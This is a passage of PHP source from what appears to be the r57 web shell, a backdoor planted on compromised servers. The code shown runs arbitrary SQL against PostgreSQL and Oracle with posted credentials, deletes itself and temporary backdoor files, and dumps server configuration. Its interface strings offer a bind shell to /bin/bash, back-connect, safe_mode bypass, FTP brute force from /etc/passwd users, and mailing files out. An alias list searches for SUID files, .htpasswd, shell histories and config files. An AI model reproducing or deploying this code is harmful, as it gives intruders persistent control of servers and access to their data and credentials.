| 440 | $sql2 .= "<tr><td><font face=Verdana size=-2> ".$values." </font></td></tr>"; | ||
| 441 | } | ||
| 442 | echo "<table width=100%>"; | ||
| 443 | $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>"; | ||
| 444 | $sql .= $sql2; | ||
| 445 | echo $sql; | ||
| 446 | echo "</table><br>"; | ||
| 447 | } | ||
| 448 | else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } | ||
| 449 | } | ||
| 450 | @pg_free_result($res); | ||
| 451 | } | ||
| 452 | } | ||
| 453 | @pg_close($db); | ||
| 454 | } | ||
| 455 | else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>"; | ||
| 456 | break; | ||
| 457 | case 'Oracle': | ||
| 458 | $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']); | ||
| 459 | if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; } | ||
| 460 | else | ||
| 461 | { | ||
| 462 | $querys = @explode(';',$_POST['db_query']); | ||
| 463 | foreach($querys as $num=>$query) | ||
| 464 | { | ||
| 465 | if(strlen($query)>5) { | ||
| 466 | echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; | ||
| 467 | $stat = @ociparse($db, $query); | ||
| 468 | @ociexecute($stat); | ||
| 469 | if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; } | ||
| 470 | else | ||
| 471 | { | ||
| 472 | $rowcount = @ocirowcount($stat); | ||
| 473 | if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";} | ||
| 474 | else { | ||
| 475 | echo "<table width=100%><tr>"; | ||
| 476 | for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b> ".htmlspecialchars(@ocicolumnname($stat, $j))." </b></font></td>"; } | ||
| 477 | echo "</tr>"; | ||
| 478 | while(ocifetch($stat)) | ||
| 479 | { | ||
| 480 | echo "<tr>"; | ||
| 481 | for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2> ".htmlspecialchars(@ociresult($stat, $j))." </font></td>"; } | ||
| 482 | echo "</tr>"; | ||
| 483 | } | ||
| 484 | echo "</table><br>"; | ||
| 485 | } | ||
| 486 | @ocifreestatement($stat); | ||
| 487 | } | ||
| 488 | } | ||
| 489 | } | ||
| 490 | @ocilogoff($db); | ||
| 491 | } | ||
| 492 | break; | ||
| 493 | } | ||
| 494 | echo "<form name=form method=POST>"; | ||
| 495 | echo in('hidden','db',0,$_POST['db']); | ||
| 496 | echo in('hidden','db_port',0,$_POST['db_port']); | ||
| 497 | echo in('hidden','mysql_l',0,$_POST['mysql_l']); | ||
| 498 | echo in('hidden','mysql_p',0,$_POST['mysql_p']); | ||
| 499 | echo in('hidden','mysql_db',0,$_POST['mysql_db']); | ||
| 500 | echo in('hidden','cmd',0,'db_query'); | ||
| 501 | echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; | ||
| 502 | echo "</form>"; | ||
| 503 | echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); | ||
| 504 | } | ||
| 505 | if(isset($_GET['delete'])) | ||
| 506 | { | ||
| 507 | @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); | ||
| 508 | } | ||
| 509 | if(isset($_GET['tmp'])) | ||
| 510 | { | ||
| 511 | @unlink("/tmp/bdpl"); | ||
| 512 | @unlink("/tmp/back"); | ||
| 513 | @unlink("/tmp/bd"); | ||
| 514 | @unlink("/tmp/bd.c"); | ||
| 515 | @unlink("/tmp/dp"); | ||
| 516 | @unlink("/tmp/dpc"); | ||
| 517 | @unlink("/tmp/dpc.c"); | ||
| 518 | } | ||
| 519 | if(isset($_GET['phpini'])) | ||
| 520 | { | ||
| 521 | echo $head; | ||
| 522 | function U_value($value) | ||
| 523 | { | ||
| 524 | if ($value == '') return '<i>no value</i>'; | ||
| 525 | if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; | ||
| 526 | if ($value === null) return 'NULL'; | ||
| 527 | if (@is_object($value)) $value = (array) $value; | ||
| 528 | if (@is_array($value)) | ||
| 529 | { | ||
| 530 | @ob_start(); | ||
| 531 | print_r($value); | ||
| 532 | $value = @ob_get_contents(); | ||
| 533 | @ob_end_clean(); | ||
| 534 | } | ||
| 535 | return U_wordwrap((string) $value); | ||
| 536 | } | ||
| 537 | function U_wordwrap($str) | ||
| 538 | { | ||
| 539 | $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); | ||
| 540 | return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); | ||
| 541 | } | ||
| 542 | if (@function_exists('ini_get_all')) | ||
| 543 | { | ||
| 544 | $r = ''; | ||
| 545 | echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; | ||
| 546 | foreach (@ini_get_all() as $key=>$value) | ||
| 547 | { | ||
| 548 | $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; | ||
| 549 | } | ||
| 550 | echo $r; | ||
| 551 | echo '</table>'; | ||
| 552 | } | ||
| 553 | echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; | ||
| 554 | die(); | ||
| 555 | } | ||
| 556 | if(isset($_GET['cpu'])) | ||
| 557 | { | ||
| 558 | echo $head; | ||
| 559 | echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; | ||
| 560 | $cpuf = @file("cpuinfo"); | ||
| 561 | if($cpuf) | ||
| 562 | { | ||
| 563 | $c = @sizeof($cpuf); | ||
| 564 | for($i=0;$i<$c;$i++) | ||
| 565 | { | ||
| 566 | $info = @explode(":",$cpuf[$i]); | ||
| 567 | if($info[1]==""){ $info[1]="---"; } | ||
| 568 | $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; | ||
| 569 | } | ||
| 570 | echo $r; | ||
| 571 | } | ||
| 572 | else | ||
| 573 | { | ||
| 574 | echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; | ||
| 575 | } | ||
| 576 | echo '</table>'; | ||
| 577 | echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; | ||
| 578 | die(); | ||
| 579 | } | ||
| 580 | if(isset($_GET['mem'])) | ||
| 581 | { | ||
| 582 | echo $head; | ||
| 583 | echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; | ||
| 584 | $memf = @file("meminfo"); | ||
| 585 | if($memf) | ||
| 586 | { | ||
| 587 | $c = sizeof($memf); | ||
| 588 | for($i=0;$i<$c;$i++) | ||
| 589 | { | ||
| 590 | $info = explode(":",$memf[$i]); | ||
| 591 | if($info[1]==""){ $info[1]="---"; } | ||
| 592 | $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; | ||
| 593 | } | ||
| 594 | echo $r; | ||
| 595 | } | ||
| 596 | else | ||
| 597 | { | ||
| 598 | echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; | ||
| 599 | } | ||
| 600 | echo '</table>'; | ||
| 601 | echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; | ||
| 602 | die(); | ||
| 603 | } | ||
| 604 | $lang=array( | ||
| 605 | 'ru_text1' =>'??????????? ???????', | ||
| 606 | 'ru_text2' =>'?????????? ?????? ?? ???????', | ||
| 607 | 'ru_text3' =>'????????? ???????', | ||
| 608 | 'ru_text4' =>'??????? ??????????', | ||
| 609 | 'ru_text5' =>'???????? ?????? ?? ??????', | ||
| 610 | 'ru_text6' =>'????????? ????', | ||
| 611 | 'ru_text7' =>'??????', | ||
| 612 | 'ru_text8' =>'???????? ?????', | ||
| 613 | 'ru_butt1' =>'?????????', | ||
| 614 | 'ru_butt2' =>'?????????', | ||
| 615 | 'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', | ||
| 616 | 'ru_text10'=>'??????? ????', | ||
| 617 | 'ru_text11'=>'?????? ??? ???????', | ||
| 618 | 'ru_butt3' =>'???????', | ||
| 619 | 'ru_text12'=>'back-connect', | ||
| 620 | 'ru_text13'=>'IP-?????', | ||
| 621 | 'ru_text14'=>'????', | ||
| 622 | 'ru_butt4' =>'?????????', | ||
| 623 | 'ru_text15'=>'???????? ?????? ? ?????????? ???????', | ||
| 624 | 'ru_text16'=>'????????????', | ||
| 625 | 'ru_text17'=>'????????? ????', | ||
| 626 | 'ru_text18'=>'????????? ????', | ||
| 627 | 'ru_text19'=>'Exploits', | ||
| 628 | 'ru_text20'=>'????????????', | ||
| 629 | 'ru_text21'=>'????? ???', | ||
| 630 | 'ru_text22'=>'datapipe', | ||
| 631 | 'ru_text23'=>'????????? ????', | ||
| 632 | 'ru_text24'=>'????????? ????', | ||
| 633 | 'ru_text25'=>'????????? ????', | ||
| 634 | 'ru_text26'=>'????????????', | ||
| 635 | 'ru_butt5' =>'?????????', | ||
| 636 | 'ru_text28'=>'?????? ? safe_mode', | ||
| 637 | 'ru_text29'=>'?????? ????????', | ||
| 638 | 'ru_butt6' =>'???????', | ||
| 639 | 'ru_text30'=>'???????? ?????', | ||
| 640 | 'ru_butt7' =>'???????', | ||
| 641 | 'ru_text31'=>'???? ?? ??????', | ||
| 642 | 'ru_text32'=>'?????????? PHP ????', | ||
| 643 | 'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL', | ||
| 644 | 'ru_butt8' =>'?????????', | ||
| 645 | 'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include', | ||
| 646 | 'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql', | ||
| 647 | 'ru_text36'=>'????', | ||
| 648 | 'ru_text37'=>'?????', | ||
| 649 | 'ru_text38'=>'??????', | ||
| 650 | 'ru_text39'=>'???????', | ||
| 651 | 'ru_text40'=>'???? ??????? ???? ??????', | ||
| 652 | 'ru_butt9' =>'????', | ||
| 653 | 'ru_text41'=>'????????? ? ?????', | ||
| 654 | 'ru_text42'=>'?????????????? ?????', | ||
| 655 | 'ru_text43'=>'????????????? ????', | ||
| 656 | 'ru_butt10'=>'?????????', | ||
| 657 | 'ru_butt11'=>'?????????????', | ||
| 658 | 'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!', | ||
| 659 | 'ru_text45'=>'???? ????????', | ||
| 660 | 'ru_text46'=>'???????? phpinfo()', | ||
| 661 | 'ru_text47'=>'???????? ???????? php.ini', | ||
| 662 | 'ru_text48'=>'???????? ????????? ??????', | ||
| 663 | 'ru_text49'=>'???????? ??????? ? ???????', | ||
| 664 | 'ru_text50'=>'?????????? ? ??????????', | ||
| 665 | 'ru_text51'=>'?????????? ? ??????', | ||
| 666 | 'ru_text52'=>'????? ??? ??????', | ||
| 667 | 'ru_text53'=>'?????? ? ?????', | ||
| 668 | 'ru_text54'=>'????? ?????? ? ??????', | ||
| 669 | 'ru_butt12'=>'?????', | ||
| 670 | 'ru_text55'=>'?????? ? ??????', | ||
| 671 | 'ru_text56'=>'?????? ?? ???????', | ||
| 672 | 'ru_text57'=>'???????/??????? ????/??????????', | ||
| 673 | 'ru_text58'=>'???', | ||
| 674 | 'ru_text59'=>'????', | ||
| 675 | 'ru_text60'=>'??????????', | ||
| 676 | 'ru_butt13'=>'???????/???????', | ||
| 677 | 'ru_text61'=>'???? ??????', | ||
| 678 | 'ru_text62'=>'?????????? ???????', | ||
| 679 | 'ru_text63'=>'???? ??????', | ||
| 680 | 'ru_text64'=>'?????????? ???????', | ||
| 681 | 'ru_text65'=>'???????', | ||
| 682 | 'ru_text66'=>'???????', | ||
| 683 | 'ru_text67'=>'Chown/Chgrp/Chmod', | ||
| 684 | 'ru_text68'=>'???????', | ||
| 685 | 'ru_text69'=>'????????1', | ||
| 686 | 'ru_text70'=>'????????2', | ||
| 687 | 'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)", | ||
| 688 | 'ru_text72'=>'????? ??? ??????', | ||
| 689 | 'ru_text73'=>'?????? ? ?????', | ||
| 690 | 'ru_text74'=>'?????? ? ??????', | ||
| 691 | 'ru_text75'=>'* ????? ???????????? ?????????? ?????????', | ||
| 692 | 'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', | ||
| 693 | 'ru_text77'=>'???????? ????????? ???? ??????', | ||
| 694 | 'ru_text78'=>'?????????? ???????', | ||
| 695 | 'ru_text79'=>'?????????? ???????', | ||
| 696 | 'ru_text80'=>'???', | ||
| 697 | 'ru_text81'=>'????', | ||
| 698 | 'ru_text82'=>'???? ??????', | ||
| 699 | 'ru_text83'=>'?????????? SQL ???????', | ||
| 700 | 'ru_text84'=>'SQL ??????', | ||
| 701 | 'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????', | ||
| 702 | 'ru_text86'=>'?????????? ????? ? ???????', | ||
| 703 | 'ru_butt14'=>'???????', | ||
| 704 | 'ru_text87'=>'???????? ?????? ? ?????????? ftp-???????', | ||
| 705 | 'ru_text88'=>'FTP-??????:????', | ||
| 706 | 'ru_text89'=>'???? ?? ftp ???????', | ||
| 707 | 'ru_text90'=>'????? ????????', | ||
| 708 | 'ru_text91'=>'???????????? ?', | ||
| 709 | 'ru_text92'=>'??? ?????????', | ||
| 710 | 'ru_text93'=>'FTP', | ||
| 711 | 'ru_text94'=>'FTP-????????', | ||
| 712 | 'ru_text95'=>'?????? ?????????????', | ||
| 713 | 'ru_text96'=>'?? ??????? ???????? ?????? ?????????????', | ||
| 714 | 'ru_text97'=>'????????? ??????????: ', | ||
| 715 | 'ru_text98'=>'??????? ???????????: ', | ||
| 716 | 'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd', | ||
| 717 | 'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????', | ||
| 718 | 'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????', | ||
| 719 | 'ru_text102'=>'?????', | ||
| 720 | 'ru_text103'=>'???????? ??????', | ||
| 721 | 'ru_text104'=>'???????? ????? ?? ???????? ????', | ||
| 722 | 'ru_text105'=>'????', | ||
| 723 | 'ru_text106'=>'??', | ||
| 724 | 'ru_text107'=>'????', | ||
| 725 | 'ru_butt15'=>'?????????', | ||
| 726 | 'ru_text108'=>'????? ??????', | ||
| 727 | 'ru_text109'=>'????????', | ||
| 728 | 'ru_text110'=>'??????????', | ||
| 729 | /* --------------------------------------------------------------- */ | ||
| 730 | 'eng_text1' =>'Executed command', | ||
| 731 | 'eng_text2' =>'Execute command on server', | ||
| 732 | 'eng_text3' =>'Run command', | ||
| 733 | 'eng_text4' =>'Work directory', | ||
| 734 | 'eng_text5' =>'Upload files on server', | ||
| 735 | 'eng_text6' =>'Local file', | ||
| 736 | 'eng_text7' =>'Aliases', | ||
| 737 | 'eng_text8' =>'Select alias', | ||
| 738 | 'eng_butt1' =>'Execute', | ||
| 739 | 'eng_butt2' =>'Upload', | ||
| 740 | 'eng_text9' =>'Bind port to /bin/bash', | ||
| 741 | 'eng_text10'=>'Port', | ||
| 742 | 'eng_text11'=>'Password for access', | ||
| 743 | 'eng_butt3' =>'Bind', | ||
| 744 | 'eng_text12'=>'back-connect', | ||
| 745 | 'eng_text13'=>'IP', | ||
| 746 | 'eng_text14'=>'Port', | ||
| 747 | 'eng_butt4' =>'Connect', | ||
| 748 | 'eng_text15'=>'Upload files from remote server', | ||
| 749 | 'eng_text16'=>'With', | ||
| 750 | 'eng_text17'=>'Remote file', | ||
| 751 | 'eng_text18'=>'Local file', | ||
| 752 | 'eng_text19'=>'Exploits', | ||
| 753 | 'eng_text20'=>'Use', | ||
| 754 | 'eng_text21'=>' New name', | ||
| 755 | 'eng_text22'=>'datapipe', | ||
| 756 | 'eng_text23'=>'Local port', | ||
| 757 | 'eng_text24'=>'Remote host', | ||
| 758 | 'eng_text25'=>'Remote port', | ||
| 759 | 'eng_text26'=>'Use', | ||
| 760 | 'eng_butt5' =>'Run', | ||
| 761 | 'eng_text28'=>'Work in safe_mode', | ||
| 762 | 'eng_text29'=>'ACCESS DENIED', | ||
| 763 | 'eng_butt6' =>'Change', | ||
| 764 | 'eng_text30'=>'Cat file', | ||
| 765 | 'eng_butt7' =>'Show', | ||
| 766 | 'eng_text31'=>'File not found', | ||
| 767 | 'eng_text32'=>'Eval PHP code', | ||
| 768 | 'eng_text33'=>'Test bypass open_basedir with cURL functions', | ||
| 769 | 'eng_butt8' =>'Test', | ||
| 770 | 'eng_text34'=>'Test bypass safe_mode with include function', | ||
| 771 | 'eng_text35'=>'Test bypass safe_mode with load file in mysql', | ||
| 772 | 'eng_text36'=>'Database', | ||
| 773 | 'eng_text37'=>'Login', | ||
| 774 | 'eng_text38'=>'Password', | ||
| 775 | 'eng_text39'=>'Table', | ||
| 776 | 'eng_text40'=>'Dump database table', | ||
| 777 | 'eng_butt9' =>'Dump', | ||
| 778 | 'eng_text41'=>'Save dump in file', | ||
| 779 | 'eng_text42'=>'Edit files', | ||
| 780 | 'eng_text43'=>'File for edit', | ||
| 781 | 'eng_butt10'=>'Save', | ||
| 782 | 'eng_text44'=>'Can\'t edit file! Only read access!', | ||
| 783 | 'eng_text45'=>'File saved', | ||
| 784 | 'eng_text46'=>'Show phpinfo()', | ||
| 785 | 'eng_text47'=>'Show variables from php.ini', | ||
| 786 | 'eng_text48'=>'Delete temp files', | ||
| 787 | 'eng_butt11'=>'Edit file', | ||
| 788 | 'eng_text49'=>'Delete script from server', | ||
| 789 | 'eng_text50'=>'View cpu info', | ||
| 790 | 'eng_text51'=>'View memory info', | ||
| 791 | 'eng_text52'=>'Find text', | ||
| 792 | 'eng_text53'=>'In dirs', | ||
| 793 | 'eng_text54'=>'Find text in files', | ||
| 794 | 'eng_butt12'=>'Find', | ||
| 795 | 'eng_text55'=>'Only in files', | ||
| 796 | 'eng_text56'=>'Nothing :(', | ||
| 797 | 'eng_text57'=>'Create/Delete File/Dir', | ||
| 798 | 'eng_text58'=>'name', | ||
| 799 | 'eng_text59'=>'file', | ||
| 800 | 'eng_text60'=>'dir', | ||
| 801 | 'eng_butt13'=>'Create/Delete', | ||
| 802 | 'eng_text61'=>'File created', | ||
| 803 | 'eng_text62'=>'Dir created', | ||
| 804 | 'eng_text63'=>'File deleted', | ||
| 805 | 'eng_text64'=>'Dir deleted', | ||
| 806 | 'eng_text65'=>'Create', | ||
| 807 | 'eng_text66'=>'Delete', | ||
| 808 | 'eng_text67'=>'Chown/Chgrp/Chmod', | ||
| 809 | 'eng_text68'=>'Command', | ||
| 810 | 'eng_text69'=>'param1', | ||
| 811 | 'eng_text70'=>'param2', | ||
| 812 | 'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", | ||
| 813 | 'eng_text72'=>'Text for find', | ||
| 814 | 'eng_text73'=>'Find in folder', | ||
| 815 | 'eng_text74'=>'Find in files', | ||
| 816 | 'eng_text75'=>'* you can use regexp', | ||
| 817 | 'eng_text76'=>'Search text in files via find', | ||
| 818 | 'eng_text77'=>'Show database structure', | ||
| 819 | 'eng_text78'=>'show tables', | ||
| 820 | 'eng_text79'=>'show columns', | ||
| 821 | 'eng_text80'=>'Type', | ||
| 822 | 'eng_text81'=>'Net', | ||
| 823 | 'eng_text82'=>'Databases', | ||
| 824 | 'eng_text83'=>'Run SQL query', | ||
| 825 | 'eng_text84'=>'SQL query', | ||
| 826 | 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', | ||
| 827 | 'eng_text86'=>'Download files from server', | ||
| 828 | 'eng_butt14'=>'Download', | ||
| 829 | 'eng_text87'=>'Download files from remote ftp-server', | ||
| 830 | 'eng_text88'=>'FTP-server:port', | ||
| 831 | 'eng_text89'=>'File on ftp', | ||
| 832 | 'eng_text90'=>'Transfer mode', | ||
| 833 | 'eng_text91'=>'Archivation', | ||
| 834 | 'eng_text92'=>'without archivation', | ||
| 835 | 'eng_text93'=>'FTP', | ||
| 836 | 'eng_text94'=>'FTP-bruteforce', | ||
| 837 | 'eng_text95'=>'Users list', | ||
| 838 | 'eng_text96'=>'Can\'t get users list', | ||
| 839 | 'eng_text97'=>'checked: ', | ||
| 840 | 'eng_text98'=>'success: ', | ||
| 841 | 'eng_text99'=>'* use username from /etc/passwd for ftp login and password', | ||
| 842 | 'eng_text100'=>'Send file to remote ftp server', | ||
| 843 | 'eng_text101'=>'Use reverse (user -> resu) login for password', | ||
| 844 | 'eng_text102'=>'Mail', | ||
| 845 | 'eng_text103'=>'Send email', | ||
| 846 | 'eng_text104'=>'Send file to email', | ||
| 847 | 'eng_text105'=>'To', | ||
| 848 | 'eng_text106'=>'From', | ||
| 849 | 'eng_text107'=>'Subj', | ||
| 850 | 'eng_butt15'=>'Send', | ||
| 851 | 'eng_text108'=>'Mail', | ||
| 852 | 'eng_text109'=>'Hide', | ||
| 853 | 'eng_text110'=>'Show', | ||
| 854 | ); | ||
| 855 | /* | ||
| 856 | ?????? ?????? | ||
| 857 | ????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) | ||
| 858 | ?? ?????? ???? ????????? ??? ???????? ???????. | ||
| 859 | */ | ||
| 860 | $aliases=array( | ||
| 861 | 'find suid files'=>'find / -type f -perm -04000 -ls', | ||
| 862 | 'find suid files in current dir'=>'find . -type f -perm -04000 -ls', | ||
| 863 | 'find sgid files'=>'find / -type f -perm -02000 -ls', | ||
| 864 | 'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', | ||
| 865 | 'find config.inc.php files'=>'find / -type f -name config.inc.php', | ||
| 866 | 'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', | ||
| 867 | 'find config* files'=>'find / -type f -name "config*"', | ||
| 868 | 'find config* files in current dir'=>'find . -type f -name "config*"', | ||
| 869 | 'find all writable files'=>'find / -type f -perm -2 -ls', | ||
| 870 | 'find all writable files in current dir'=>'find . -type f -perm -2 -ls', | ||
| 871 | 'find all writable directories'=>'find / -type d -perm -2 -ls', | ||
| 872 | 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', | ||
| 873 | 'find all writable directories and files'=>'find / -perm -2 -ls', | ||
| 874 | 'find all writable directories and files in current dir'=>'find . -perm -2 -ls', | ||
| 875 | 'find all service.pwd files'=>'find / -type f -name service.pwd', | ||
| 876 | 'find service.pwd files in current dir'=>'find . -type f -name service.pwd', | ||
| 877 | 'find all .htpasswd files'=>'find / -type f -name .htpasswd', | ||
| 878 | 'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', | ||
| 879 | 'find all .bash_history files'=>'find / -type f -name .bash_history', | ||
| 880 | 'find .bash_history files in current dir'=>'find . -type f -name .bash_history', | ||
| 881 | 'find all .mysql_history files'=>'find / -type f -name .mysql_history', | ||
| 882 | 'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', | ||
| 883 | 'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', | ||
| 884 | 'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', | ||
| 885 | 'list file attributes on a Linux second extended file system'=>'lsattr -va', | ||
| 886 | 'show opened ports'=>'netstat -an | grep -i listen', | ||
| 887 | '----------------------------------------------------------------------------------------------------'=>'ls -la' | ||
| 888 | ); | ||
| 889 | $table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: "; | ||
| 890 | $table_up2 = " ::</div></b></font></td></tr><tr><td>"; | ||
| 891 | $table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; | ||
| 892 | $table_end1 = "</td></tr>"; | ||
| 893 | $arrow = " <font face=Wingdings color=gray>?</font>"; | ||
| 894 | $lb = "<font color=black>[</font>"; | ||
| 895 | $rb = "<font color=black>]</font>"; | ||
| 896 | $font = "<font face=Verdana size=-2>"; | ||
| 897 | $ts = "<table class=table1 width=100% align=center>"; | ||
| 898 | $te = "</table>"; | ||
| 899 | $fs = "<form name=form method=POST>"; | ||
| 900 | $fe = "</form>"; | ||
| 901 | |||
| 902 | if(isset($_GET['users'])) | ||
| 903 | { | ||
| 904 | if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; } | ||
| 905 | else | ||
| 906 | { | ||
| 907 | echo '<center>'; | ||
| 908 | foreach($users as $user) { echo $user."<br>"; } | ||
| 909 | echo '</center>'; | ||
| 910 | } | ||
| 911 | echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); | ||
| 912 | } | ||
| 913 | |||
| 914 | if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } | ||
| 915 | $dir = @getcwd(); | ||
| 916 | $windows = 0; | ||
| 917 | $unix = 0; | ||
| 918 | if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; | ||
| 919 | if(empty($dir)) | ||
| 920 | { | ||
| 921 | $os = getenv('OS'); | ||
| 922 | if(empty($os)){ $os = php_uname(); } | ||
| 923 | if(empty($os)){ $os ="-"; $unix=1; } | ||
| 924 | else | ||
| 925 | { | ||
| 926 | if(@eregi("^win",$os)) { $windows = 1; } | ||
| 927 | else { $unix = 1; } | ||
| 928 | } | ||
| 929 | } | ||
| 930 | if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") | ||
| 931 | { | ||
| 932 | echo $head; | ||
| 933 | if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } | ||
| 934 | else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } | ||
| 935 | $sr->SearchText(0,0); | ||
| 936 | $res = $sr->GetResultFiles(); | ||
| 937 | $found = $sr->GetMatchesCount(); | ||
| 938 | $titles = $sr->GetTitles(); | ||
| 939 | $r = ""; | ||
| 940 | if($found > 0) | ||
| 941 | { | ||
| 942 | $r .= "<TABLE width=100%>"; | ||
| 943 | foreach($res as $file=>$v) | ||
| 944 | { | ||
| 945 | $r .= "<TR>"; | ||
| 946 | $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); | ||
| 947 | $r .= ($windows)? str_replace("/","\\",$file) : $file; | ||
| 948 | $r .= "</b></font></ TD>"; | ||
| 949 | $r .= "</TR>"; | ||
| 950 | foreach($v as $a=>$b) | ||
| 951 | { | ||
| 952 | $r .= "<TR>"; | ||
| 953 | $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; | ||
| 954 | $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; | ||
| 955 | $r .= "</TR>\n"; | ||
| 956 | } | ||
| 957 | } | ||
| 958 | $r .= "</TABLE>"; | ||
| 959 | echo $r; | ||
| 960 | } | ||
| 961 | else | ||
| 962 | { | ||
| 963 | echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>"; | ||
| 964 | } | ||
| 965 | echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; | ||
| 966 | die(); | ||
| 967 | } | ||
| 968 | if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } | ||
| 969 | $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); | ||
| 970 | if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } | ||
| 971 | function ws($i) | ||
| 972 | { | ||
| 973 | return @str_repeat(" ",$i); | ||
| 974 | } | ||
